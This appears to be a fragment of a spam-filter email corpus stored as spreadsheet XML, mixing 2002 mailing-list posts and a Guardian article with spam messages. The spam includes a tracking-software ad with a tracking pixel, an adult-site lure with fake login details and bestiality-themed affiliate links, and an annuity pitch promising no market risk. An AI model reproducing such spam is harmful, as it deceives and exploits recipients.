 &lt;html&gt;&lt;head&gt;&lt;title&gt;Untitled Document&lt;/title&gt;&lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt;&lt;/head&gt;&lt;body bgcolor="#FFFFFF" text="#000000" background="PCPhonehome"&gt;&lt;table width="500" border="8" cellspacing="0" cellpadding="0" align="center" bordercolor="#660000" height="400" background="http://www.pclojack.com/images/email/bglogo1.jpg"&gt;&lt;tr&gt;    &lt;td valign="top"&gt;       &lt;table width="500" border="0" cellpadding="4" align="center" bordercolor="#DDD2D2" cellspacing="0"&gt;        &lt;tr bgcolor="#DDD2D2"&gt;           &lt;td colspan="2"&gt;&lt;a href="http://www.pclojack.com"&gt;&lt;img src="http://www.pclojack.com/images/email/logo_2.gif" width="220" height="64" border="0"&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt; &lt;td colspan="2"&gt; &lt;div align="center"&gt;&lt;font face="Arial, Helvetica, sans-serif" color="#FF0000" size="5"&gt;&lt;font color="#660000" size="6" face="Verdana, Arial, Helvetica, sans-serif"&gt;Don't Be A Victim!&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr align="center"&gt;&lt;td colspan="2"&gt;             &lt;table width="100%" border="0" cellpadding="4"&gt;
 &lt;tr&gt; &lt;td&gt;&lt;a href="http://www.pclojack.com"&gt;&lt;img src="http://www.pclojack.com/images/email/bullet.gif" width="24" height="24" align="absmiddle" border="0"&gt;&lt;/a&gt;&lt;/td&gt;                &lt;td&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;Tracks your missing computer anywhere in the world. &lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt; &lt;td&gt;&lt;a href="http://www.pclojack.com"&gt;&lt;img src="http://www.pclojack.com/images/email/bullet.gif" width="24" height="24" align="absmiddle" border="0"&gt;&lt;/a&gt;&lt;/td&gt;                &lt;td&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;Sends a stealth signal to an e-mail address of your choice containing  your computer's exact location.&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt; &lt;td&gt;&lt;a href="http://www.pclojack.com"&gt;&lt;img src="http://www.pclojack.com/images/email/bullet.gif" width="24" height="24" align="middle" border="0"&gt;&lt;/a&gt;&lt;/td&gt;&lt;td&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;&lt;b&gt;Cannot  be removed by unauthorized parties even if they attempt to wipe the computer's hard drive using format or fdisk commands.&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt; &lt;td&gt;&lt;a href="http://www.pclojack.com"&gt;&lt;img src="http://www.pclojack.com/images/email/bullet.gif" width="24" height="24" align="absmiddle" border="0"&gt;&lt;/a&gt; &lt;/td&gt;&lt;td&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;&lt;b&gt;For Windows &amp;amp; Mac operating systems. Protects both desktops                   &amp;amp; laptops. &lt;img src="http://www.pclojack.com/images/email/opens2.gif" width="1" height="1"&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;/table&gt; &lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td align="center" colspan="2"&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;&lt;b&gt;&lt;font color="#FF0000"&gt;Protect Yourself NOW with our Cost effective solution!&lt;br&gt;            &lt;br&gt;&lt;a href="http://www.pclojack.com"&gt;&lt;img src="http://www.pclojack.com/images/email/readmore.jpg" width="135" height="28" border="0"&gt;&lt;/a&gt; &lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;form name="form1" method="post" action="http://www.totalglobe.net/inks/cgi-bin/remove.cgi"&gt;              
 &lt;div align="center"&gt;&lt;font face="Arial" size="1"&gt;To be removed from  our mailing list enter your Email in the form below and click remove.&lt;/font&gt;&lt;font face="Arial" size="2"&gt;&lt;br&gt;
 &lt;font size="1"&gt;Email Address: &lt;input type="text" name="name" maxlength="100" size="25"&gt;&lt;input type="submit" name="Submit" value="Remove"&gt;&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;&lt;/form&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/body&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [Razor-users] Razor 2.14 - the day after
</t>
  </si>
  <si>
    <t xml:space="preserve">Good day, Fox,
 On Fri, 23 Aug 2002, Fox wrote:
 &gt; I recently installed Razor v2.14 and started using it.  I am finding it
 &gt; necessary to whitelist a _lot_ of mailing lists.  Some, such as yahoogroups,
 &gt; I can't whitelist because the from: address is the person making the post,
 &gt; so I will have to whitelist on another field when I can modify my code to do
 &gt; so.  I wonder if someone is not being careful about their submissions, or if
 &gt; these are bad mailing lists that don't drop bad mail addresses that become
 &gt; trollboxes in time.
 	I've found excellent luck with the X-Been____There header (____'s 
 added to to avoid tripping procmail rules):
 ____X-Been____There: news@jabber.org
 	Cheers,
 	- Bill
 ---------------------------------------------------------------------------
 	"Nynex.  Iroquois for Moron"
 	-- A well-known Linux kernel hacker.
 --------------------------------------------------------------------------
 William Stearns (wstearns@pobox.com).  Mason, Buildkernel, named2hosts, 
 and ipfwadm2ipchains are at:                        http://www.stearns.org
 --------------------------------------------------------------------------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</si>
  <si>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[NOVICE] pl/pgsql and returns timestamp type
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi all,
 I cannot to get this to run...  I think I am mistaking some basic concept or I have a big brain-lock .  Somebody know what is the problem to execute this function ?
 Thanks in advance...
 --====================================
 DROP TABLE test;
 CREATE TABLE test
 (
   clave numeric(7,0) not null,
   PRIMARY KEY (clave)
 ) WITHOUT OIDS;
 --====================================
 DROP FUNCTION f_test(numeric(7,0), numeric(7,0));
 CREATE OR REPLACE FUNCTION f_test(numeric(7,0), numeric(7,0)) RETURNS timestamp AS '
   DECLARE
     p_datod ALIAS FOR $1;
     p_datoh ALIAS FOR $2;
     --
     tdesde timestamp;
     thasta timestamp;
   BEGIN
     tdesde := now();
     --
     FOR X IN p_datod..p_datoh LOOP
       INSERT INTO test VALUES (x);    
     END LOOP;
     --
     thasta := now() - tdesde;
     RETURN thasta;
   COMMIT;
   END;
 ' LANGUAGE 'plpgsql';
 --====================================
 select f_test(1,9);
 ---------------------------(end of broadcast)---------------------------
 TIP 1: subscribe and unsubscribe commands go to majordomo@postgresql.org
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] Fwd: Hill Monuments defaced to promote hunting
</t>
  </si>
  <si>
    <t xml:space="preserve">The hunting community showing, yet again, how utterly out of touch they 
 are....(though the anti-Esso sign on the Long Man made me smirk last week)
 &gt;From: "Carol"
 &gt;
 &gt;The white horses at Uffington and Kilburn have had hunters painted
 &gt;onto them to 'keep the pro-hunt image in the media'
 &gt;
 &gt;http://www.ananova.com/news/story/sm_658592.html
 &gt;
 &gt;*boggle* How can the pro-hunt people think this will help their cause?
 &gt;
 &gt;Carol
 Giant horse images 'defaced by hunting activists'
 Pro-hunt activists have defaced two of the country's national monuments - 
 the two giant white horses - to highlight their cause
 Campaigners for the Real Countryside Alliance say they targeted the two 
 images, on hills in Oxfordshire and North Yorkshire, "to keep the pro-hunt 
 thing in the papers".
 Ananova:
 Giant horse images 'defaced by hunting activists'
 Pro-hunt activists have defaced two of the country's national monuments - 
 the two giant white horses - to highlight their cause.
 Campaigners for the Real Countryside Alliance say they targeted the two 
 images, on hills in Oxfordshire and North Yorkshire, "to keep the pro-hunt 
 thing in the papers".
 Aerial shots show the 374ft-long Bronze Age image on the Berkshire Downs 
 near Uffington in Oxfordshire complete with three white hounds and a rider.
 In North Yorkshire, a rider in full hunt regalia has been added to the 300ft 
 White Horse cut in to the hills at Kilburn, which dates back to the 1700s.
 But no-one reported anything to the police.
 A spokesman for North Yorkshire police said no reports had been received but 
 he had seen "a red blob" on the horse and had sent officers to investigate.
 In Uffington, no-one in the village had heard anything about the reported 
 incident. A spokesman for Thames Valley police said he was not aware of any 
 complaints.
 Activists say the image in Oxfordshire was drawn in paint used for marking 
 lines on grass tennis courts and will wash away in the first rains.
 Story filed: 21:17 Tuesday 27th August 2002
 Scott
 "I cried for madder music and for stronger wine"
 Ernest Dowson
 _________________________________________________________________
 MSN Photos is the easiest way to share and print your photos: 
 http://photos.msn.com/support/worldwide.aspx
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 4 DVDs Free +s&amp;p Join Now
 http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Making a mesh on the move
</t>
  </si>
  <si>
    <t xml:space="preserve">
 http://www.guardian.co.uk/Print/0%2c3858%2c4489999%2c00.html
 Making a mesh on the move
 A new way to give us fast mobile net access spells further trouble for 3G, 
 reports Peter Rojas
 Peter Rojas
 Thursday August 29, 2002
 The Guardian
 Imagine being able to surf the net at speeds faster than DSL from 
 anywhere, at any time - you could watch a live video webcast while waiting 
 for the bus, email photos to your friends while sitting in the park, or 
 download the MP3 of the song that's playing in the pub before it finishes.
 This is the vision of a high-speed wireless internet paradise that the 
 third-generation (3G) mobile phone companies have been promoting for 
 years. 3G services are just beginning to be rolled out, but a new 
 technology called mesh networking promises to deliver on this vision 
 sooner and more effectively than the mobile phone companies could ever 
 dream.
 Two companies, US startup MeshNetworks and Moteran Networks of Germany, 
 are each developing their own competing version of mesh networking. 
 Instead of the current hub-and-spoke model of wireless communications, 
 with every device connecting to an overburdened central antenna, any time 
 "mesh-enabled" devices - mobile phones, PDAs, laptops - are in close 
 proximity to each other, they automatically create a wireless mesh 
 network. Every device in the area acts as a repeater or router, relaying 
 traffic for everyone else. Traffic hops from person to person until it 
 reaches the nearest internet access point, reducing the need for central 
 antennas, and improving wireless coverage.
 As the number of mobile phones soars, and wireless PDAs, laptops, and 
 other devices begin to crowd the spectrum, this approach to wireless 
 networking may be inevitable.
 Mesh networks also have several other advantages over 3G wireless 
 networks. While 3G operators roll out mobile services that offer users 
 connection speeds of up to 144 kbps (roughly three times faster than a 
 dial-up modem), Moteran and MeshNetworks are able to offer connection 
 speeds of up to 6Mbps, over a hundred times faster than dial-up. The 
 technologies they use include Wi-Fi - the emerging standard for high-speed 
 wireless networking also known as 802.11b. A similarly short-range 
 protocol called UltraWideBand, which is poised to succeed Wi-Fi, is even 
 faster and could, by 2005, approach 400 Mbps.
 The range of a typical Wi-Fi network is generally too limited to be of 
 much use when travelling around a city. Mesh networks get around the 
 problem of coverage by having every device in the network relay traffic. 
 Even though the range of any individual device is relatively small, 
 because (in theory) there will be so many users in the surrounding area, 
 connections will be faster and better than that of a standard 3G wireless 
 connection.
 Because mesh networks use Wi-Fi, the equipment and infrastructure needed 
 to create them is cheap and readily available. Instead of building 
 cellular phone towers that often cost hundreds of thousands of pounds, all 
 that is needed to get a network going are wireless access points (around 
 100 now) placed strategically around town to relay traffic, and the 
 proper software. Existing laptops and PDAs can be mesh-enabled by 
 software.
 It also means that anyone could set up their own mobile phone network. 
 Unlike with 3G cellular, the part of the spectrum that Wi-Fi operates on 
 is unregulated in the US, Britain. The mobile phone companies are none too 
 pleased about this, especially since many of them spent billions of pounds 
 acquiring 3G licences.
 All that's needed are cheap relays and mobile phones equipped to connect 
 to the network. With every additional customer that signs up coverage gets 
 better, instead of getting worse, as is the case with mobile phone 
 networks.
 But things get very interesting when you realise that when you have 
 high-speed internet connections everywhere, and everyone's laptops, PDAs, 
 and mobile phones are connected together at blazingly fast speeds, sharing 
 music, movies, or whatever else becomes ridiculously easy. When 
 UltraWideBand hits, all of this will just accelerate.
 At 400Mbps, copying a pirated copy of the Lord of the Rings from the 
 person sitting across from you at the cafe would take about 15 seconds. 
 Sooner or later, playgrounds will be filled with kids swapping files of 
 their favourite songs, movies, and video games.
 But the first mesh networks are not likely to be available to consumers. 
 MeshNetworks has no plans to offer its own high-speed wireless service. 
 Instead the company plans to sell its technology to others, such as cities 
 that want to provide wireless internet to police, fire, and public works 
 employees, or businesses that want to establish wireless networks on the 
 cheap. Moteran has similar aspirations for small businesses and for 
 enterprise networks.
 The first place average users may use the technology is when it is 
 incorporated into vehicles, enabling motorists to access the internet at 
 high speeds, which both companies see happening soon.
 When will you be able to wander around town with a 6Mbps connection in 
 your pocket? It's too soon to say, but just as broadband internet service 
 was initially available only to businesses and universities, eventually 
 someone will see the profit in bringing mesh networking to the masses.
</t>
  </si>
  <si>
    <t xml:space="preserve">At 11:34 AM -0400 8/21/02, Theo Van Dinter wrote:
 &gt;On Wed, Aug 21, 2002 at 10:16:33AM -0500, Frank Pineau wrote:
 &gt;&gt;  Omaha Steaks *is* spam.  I bought something from them once. 
 &gt;&gt;*Great* steaks, but
 &gt;&gt;  then they started calling me, emailing me, snail-mailing, 
 &gt;&gt;constantly.  I once
 &gt;
 &gt;If you sign up for something, it's not spam by definition, aggressive as
 &gt;they may be.  (I told them to stop calling me, and they stopped, so ...)
 I call it spam if I ask to be removed from the spamming list though. 
 I occasionally buy X-10 stuff.  I've learned from past experiences to 
 create a quick mail alias to get order confs and what not.  Then can 
 it once the order is complete because those spamming SOBs will not 
 stop filling my inbox with 3-6 ads per day.  I've LARTed them and 
 their upstream numerous times asking to be list washed.  I don't even 
 get an auto-ack.  I started a procmail recipe to reject mail to them 
 and include a form letter (I was planning on later appending every 
 piece of x-10 spam I've archived to the form letter for their reading 
 pleasure...) but I haven't gotten it to work.  Bottom line, if I gave 
 them permission to mail me (explicitly or via privacy policy), it's 
 not spam but once I told them to stop mailing me then it's spam.
 My $.02
   Justin
 -- 
 --
 Justin Shore, ES-SS ES-SSR                Pittsburg State University
 Network &amp; Systems Manager                 http://www.pittstate.edu/ois/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</si>
  <si>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Harvest Moon
</t>
  </si>
  <si>
    <t xml:space="preserve">http://spineless.org/~mod/pix/octoberMoon.jpg
 -- 
 #ken	P-)}
 Ken Coar, Sanagendamgagwedweinini  http://Golux.Com/coar/
 Author, developer, opinionist      http://Apache-Server.Com/
 "Millennium hand and shrimp!"
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Fw: User Name &amp; Password to Membership To 5 Sites zzzz@spamassassin.taint.org pviqg
</t>
  </si>
  <si>
    <t xml:space="preserve">##################################################
 #                                                #
 #                 Adult Club                     #
 #           Offers FREE Membership               #
 #                                                #
 ##################################################
 &gt;&gt;&gt;&gt;&gt;  INSTANT ACCESS TO ALL SITES NOW
 &gt;&gt;&gt;&gt;&gt;  Your User Name And Password is.
 &gt;&gt;&gt;&gt;&gt;  User Name: zzzz@spamassassin.taint.org
 &gt;&gt;&gt;&gt;&gt;  Password: 760382
 5 of the Best Adult Sites on the Internet for FREE!
 ---------------------------------------
 NEWS 08/18/02
 With just over 2.9 Million Members that signed up for FREE, Last month there were 721,184 New
 Members. Are you one of them yet???
 ---------------------------------------
 Our Membership FAQ
 Q. Why are you offering free access to 5 adult membership sites for free?
 A. I have advertisers that pay me for ad space so you don't have to pay for membership.
 Q. Is it true my membership is for life?
 A. Absolutely you'll never have to pay a cent the advertisers do.
 Q. Can I give my account to my friends and family?
 A. Yes, as long they are over the age of 18.
 Q. Do I have to sign up for all 5 membership sites?
 A. No just one to get access to all of them.
 Q. How do I get started?
 A. Click on one of the following links below to become a member.
 - These are multi million dollar operations with policies and rules.
 - Fill in the required info and they won't charge you for the Free pass!
 - If you don't believe us, just read their terms and conditions.
 ---------------------------
 # 5. &gt; Adults Farm
 http://80.71.66.8/farm/?aid=760382
 Girls and Animals Getting Freaky....FREE Lifetime Membership!!
 # 4. &gt; Sexy Celebes
 http://80.71.66.8/celebst/?aid=760382
 Thousands Of XXX Celebes doing it...FREE Lifetime Membership!!
 # 3. &gt; Play House Porn
 http://80.71.66.8/mega/?aid=760382
 Live Feeds From 60 Sites And Web Cams...FREE Lifetime Membership!!
 # 2. &gt; Asian Sex Fantasies
 http://80.71.66.8/asian/?aid=760382
 Japanese Schoolgirls, Live Sex Shows ...FREE Lifetime Membership!!
 # 1. &gt; Lesbian Lace
 http://80.71.66.8/lesbian/?aid=760382
 Girls and Girls Getting Freaky! ...FREE Lifetime Membership!!
 --------------------------
 Jennifer Simpson, Miami, FL
 Your FREE lifetime membership has entertained my boyffriend and I for
 the last two years!  Your Adult Sites are the best on the net!
 Joe Morgan Manhattan, NY
 Your live sex shows and live sex cams are unbelievable. The best part
 about your porn sites, is that they're absolutely FREE!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http://80.71.66.8/optout/ . Please allow 24 hours for removal.
 vonolmosatkirekpups
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: earthviewer (was Re: whoa}
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "K" == Kragen Sitaker &lt;kragen@pobox.com&gt; writes:
     K&gt; Planning battle tactics; for this reason, the intelligence
     K&gt; press reports, spy satellites have had 1-meter resolution for
     K&gt; many years.
 The military already have these spy satellites; they are basically
 Hubble pointed the other way, so I doubt they will be a big enough
 customer of this service to justify a next-generation wireless
 network rollout for the rest of us.
     K&gt; Finding an individual vehicle in a city might occasionally be
     K&gt; possible with 1-m images and might occasionally also be worth
     K&gt; the money.
 My car is only just over 1.5 meters across and maybe 3 meters long, so
 that means roughly six pixels total surface area.  You might find a
 16-wheeler this way, but how often do people misplace a 16-wheeler
 such that it is _that_ important to get old images of the terrain?
 Since they can't send up aircraft to update images in realtime every
 time, how is this different from just releasing the map on DVDs?  Why
 wireless?
 I thought of the common problem of lost prize cattle, but there again,
 will there really be business-case for creating a hi-res map of
 wyoming on the fly instead of just doing what they do now and hiring a
 helicopter for a few hours?
     K&gt; For small areas you have legitimate access to, it's probably
     K&gt; cheaper to go there with a digital camera and a GPS and take
     K&gt; some snapshots from ground level.  Aerial photos might be
     K&gt; cheaper for large areas, areas where you're not allowed --- or,
     K&gt; perhaps, physically able --- to go, and cases where you don't
     K&gt; have time to send a ground guy around the whole area.
 I can see lower-res being useful for Geologists, but considering their
 points of interest change only a few times every few million years,
 there's not much need to be wireless based on up-to-the-minute data.
 I expect most geologists travel with a laptop perfectly capable of DVD
 playback, and I also expect the most interesting geology is in regions
 where the wireless ain't going to go ;)
 I don't mean to nit-pick, it's just that I'm curious as to (a) the
 need for this product that justifies the extreme cost and (b) how we'd
 justify the ubiquitous next-generation wireless network that this
 product postulates when we /still/ can't find the killer app for 3G.
 -- 
 Gary Lawrence Murphy &lt;garym@teledyn.com&gt; TeleDynamics Communications Inc
  Business Advantage through Community Software : http://www.teledyn.com
 "Computers are useless.  They can only give you answers."(Pablo Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Lock in Your Clients' Gains!
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_10CEB1_01C2319D.21A2F770
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: quoted-printable
  Lock In Market-Like Gains Without Risk of Market Loss!	 Lock In
 Market-Like Gains Without Risk of Market Loss!	 Lock In Market-Like
 Gains Without Risk of Market Loss!=09
  =09
 A winning combination: The Market Choice IIISM from North American
 Company for Life &amp; Health Insurance and Safe Harbor Financial! =09
 ?	 Choose from up to five different index accounts: S&amp;P 500=AE,
 DJIASM, S&amp;P MidCap 400=AE, Russell 2000=AE, &amp; NASDAQ-100=AE1 =09
 ?	 Or, choose the security of the fixed account!	=20
 ?	 16% COMMISSION * &amp; 80% PARTICIPATION RATE **	=20
 ?	 NO RISK OF LOSS FROM MARKET DECLINES!
 YOUR CLIENTS WILL LOVE THE SECURITY OF THIS OUTSTANDING PRODUCT! =09
 ?	 Annual transfer options available: change premium allocation
 after each contract anniversary. =09
 ?	 Two different annual reset crediting methods: Daily Average or
 Annual Point-to-Point (no average). =09
  Call Safe Harbor Financial!=0A=
 800-422-0557	 Ask about the $50
 contracting bonus from Safe Harbor!(2)=09
 ? or ?
 Please fill out the form below for more information	=20
 Name:	  	 =09
 E-mail:	  =09
 Phone:	  =09
 City:	  	State:	  =09
  	  	 	   =09
 =20
 =20
  Safe Harbor Financial, In. www.SafeHarborFinancial.com
 FOR AGENT USE ONLY. NOT INTENDED FOR CONSUMER SOLICITATION PURPOSES. The
 Market Choice III(sm) annuity is issued on form series LC115 (group) and
 LS115A (individual), and state variations by North American Company for
 Life and Health Insurance, Chicago, Illinois. This product and its
 features may not be available in all states. "Dow Jones", "Dow Jones
 Industrial Average (sm)" and "DJIA(sm)" are service marks of Dow Jones
 and Company, Inc. and have been licensed for use for certain purposes by
 North American Company. Russell 2000 Index is a trademark of Frank
 Russell Company and has been licensed for use by North American Company.
 "Standard &amp; Poor's=AE", "S&amp;P=AE", "S&amp;P 500=AE", "Standard &amp; Poor's 500
 Index=AE", "S&amp;P MidCap 400 Index=AE" and "Standard &amp; Poor's MidCap 400
 Index=AE" are trademarks of the McGraw-Hill Companies, Inc. and have =
 been
 licensed for use by North American Company. The NASDAQ-100=AE, =
 NASDAQ-100
 INDEX=AE and NASDAQ=AE are registered marks of the NASDAQ Stock Market =
 Inc.
 (which with its affiliates are the "Corporations") and are licensed for
 use by North American Company. The Market Choice III(sm) annuities are
 not issued, endorsed, sold or promoted by the Corporations or any of the
 Indexes listed above. THE CORPORATIONS MAKE NO WARRANTIES AND BEAR NO
 LIABILITY WITH RESPECT TO THE MARKET CHOICE III(sm). *Commissions are
 based upon rates as of 5/1/02. Commissions may vary by state and are
 subject to change. **Participation rates are based upon rates as of
 7/3/02 and are subject to change. Participation rate is based on the S&amp;P
 500=AE and DJIA(sm) and the Daily Average Crediting Method. Call Safe
 Harbor for additional details on other indexes and participation rates.
 1NASDAQ-100=AE is available on the Point-to-Point Index Crediting Option
 only. 2Contracting Bonus will be paid once contracting with Safe Harbor
 is complete and formal.
 NDF-8079Z-ADII-421 Prt. 7/02 Exp. 9/15/2002	=20
 We don't want anyone to receive our mailings who does not wish to. This
 is professional communication sent to insurance professionals. To be
 removed from this mailing list, DO NOT REPLY to this message. Instead,
 go here: http://www.Insurancemail.net &lt;http://www.Insurancemail.net&gt;=20
 Legal Notice &lt;http://www.insuranceiq.com/legal.htm&gt; =20
 ------=_NextPart_000_10CEB1_01C2319D.21A2F770
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Lock in Your Clients' Gains&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#FFFFFF" text=3D"#000000"&gt;
 &lt;font face=3D"Arial, Helvetica, sans-serif"&gt;=20
 &lt;table width=3D"550" cellpadding=3D"0" cellspacing=3D"0" =
 align=3D"center" bgcolor=3D"#FFFFFF" bordercolor=3D"#000000" =
 border=3D"1"&gt;
   &lt;tr&gt;=20
     &lt;td&gt;=20
       &lt;table width=3D"100%" cellpadding=3D"0" cellspacing=3D"0" =
 border=3D"0" bgcolor=3D"#FFCC33"&gt;
         &lt;tr&gt;=20
           &lt;td&gt;&lt;img src=3D"http://iiq.us/images/sh/20020703-101.gif" =
 width=3D"170" height=3D"257" alt=3D"Lock In Market-Like Gains Without =
 Risk of Market Loss!"&gt;&lt;/td&gt;
           &lt;td&gt;&lt;img src=3D"http://iiq.us/images/sh/20020703-102.gif" =
 width=3D"203" height=3D"257" alt=3D"Lock In Market-Like Gains Without =
 Risk of Market Loss!"&gt;&lt;/td&gt;
           &lt;td&gt;&lt;img src=3D"http://iiq.us/images/sh/20020703-103.gif" =
 width=3D"177" height=3D"257" alt=3D"Lock In Market-Like Gains Without =
 Risk of Market Loss!"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td colspan=3D"3" bgcolor=3D"#ff0000"&gt;&lt;img =
 src=3D"http://iiq.us/images/sh/spacer.gif" width=3D"3" =
 height=3D"3"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td colspan=3D"3" width=3D"90%" bgcolor=3D"#FFCC33"&gt;=20
             &lt;table width=3D"100%" border=3D"0" cellspacing=3D"2" =
 cellpadding=3D"2"&gt;
               &lt;tr&gt;=20
                 &lt;td colspan=3D"2" align=3D"center"&gt;&lt;b&gt;A winning =
 combination: The Market=20
                   Choice III&lt;sup&gt;SM&lt;/sup&gt; from North American&lt;br&gt;
                   Company for Life &amp;amp; Health Insurance and Safe =
 Harbor Financial!&lt;/b&gt;
                 &lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"4%" align=3D"right" =
 valign=3D"baseline"&gt;&lt;b&gt;&lt;font size=3D"4"&gt;&amp;#149;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td width=3D"96%"&gt;&lt;font size=3D"2"&gt;Choose from up to =
 five different=20
                   index accounts: S&amp;amp;P 500&lt;sup&gt;&amp;reg;&lt;/sup&gt;, =
 DJIA&lt;sup&gt;SM&lt;/sup&gt;,=20
                   S&amp;amp;P MidCap 400&lt;sup&gt;&amp;reg;&lt;/sup&gt;, Russell =
 2000&lt;sup&gt;&amp;reg;&lt;/sup&gt;,=20
                   &amp;amp; NASDAQ-100&lt;sup&gt;&amp;reg;1&lt;/sup&gt;&lt;/font&gt;
                 &lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"4%" align=3D"right" =
 valign=3D"baseline"&gt;&lt;b&gt;&lt;font size=3D"4"&gt;&amp;#149;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td width=3D"96%"&gt;&lt;font size=3D"2"&gt;Or, choose the =
 security of the fixed account!&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"4%" align=3D"right" =
 valign=3D"baseline"&gt;&lt;b&gt;&lt;font size=3D"4"&gt;&amp;#149;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td width=3D"96%"&gt;&lt;font size=3D"2"&gt;16% COMMISSION * =
 &amp;amp; 80% PARTICIPATION RATE **&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"4%" align=3D"right" =
 valign=3D"baseline"&gt;&lt;b&gt;&lt;font size=3D"4"&gt;&amp;#149;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td width=3D"96%"&gt;&lt;font size=3D"2" =
 color=3D"#cc0000"&gt;&lt;b&gt;&lt;u&gt;NO RISK OF LOSS FROM MARKET DECLINES!&lt;br&gt;
                   YOUR CLIENTS WILL LOVE THE SECURITY OF THIS =
 OUTSTANDING PRODUCT!&lt;/u&gt;&lt;/b&gt;&lt;/font&gt;
                 &lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"4%" align=3D"right" =
 valign=3D"baseline"&gt;&lt;b&gt;&lt;font size=3D"4"&gt;&amp;#149;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td width=3D"96%"&gt;&lt;font size=3D"2"&gt;Annual transfer =
 options available:=20
                   change premium allocation after each contract =
 anniversary.&lt;/font&gt;
                 &lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"4%" align=3D"right" =
 valign=3D"baseline"&gt;&lt;b&gt;&lt;font size=3D"4"&gt;&amp;#149;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td width=3D"96%"&gt;&lt;font size=3D"2"&gt;Two different annual =
 reset crediting=20
                   methods: Daily Average or Annual Point-to-Point (no =
 average).&lt;/font&gt;
                 &lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr bgcolor=3D"#FFCC33"&gt;=20
           &lt;td colspan=3D"3"&gt;=20
             &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
               &lt;tr&gt;=20
                 &lt;td&gt;&lt;img =
 src=3D"http://iiq.us/images/sh/20020703-202.gif" width=3D"350" =
 height=3D"83" alt=3D"Call Safe Harbor Financial!&amp;#10;800-422-0557"&gt;&lt;/td&gt;
                 &lt;td&gt;&lt;img =
 src=3D"http://iiq.us/images/sh/20020703-201.gif" width=3D"195" =
 height=3D"170" alt=3D"Ask about the $50 contracting bonus from Safe =
 Harbor!(2)"&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr bgcolor=3D"#FFCC33" align=3D"center"&gt;=20
           &lt;td colspan=3D"3"&gt;&lt;font size=3D"2"&gt;&lt;b&gt;&amp;#151; or =
 &amp;#151;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
             &lt;table width=3D"95%" bgcolor=3D"#000000"&gt;
               &lt;tr&gt;=20
                 &lt;form method=3D"post" =
 action=3D"http://65.217.159.103/response/response.asp"&gt;
                   &lt;td&gt;=20
                     &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"2" align=3D"center" bgcolor=3D"#ffffff"&gt;
                       &lt;tr&gt;=20
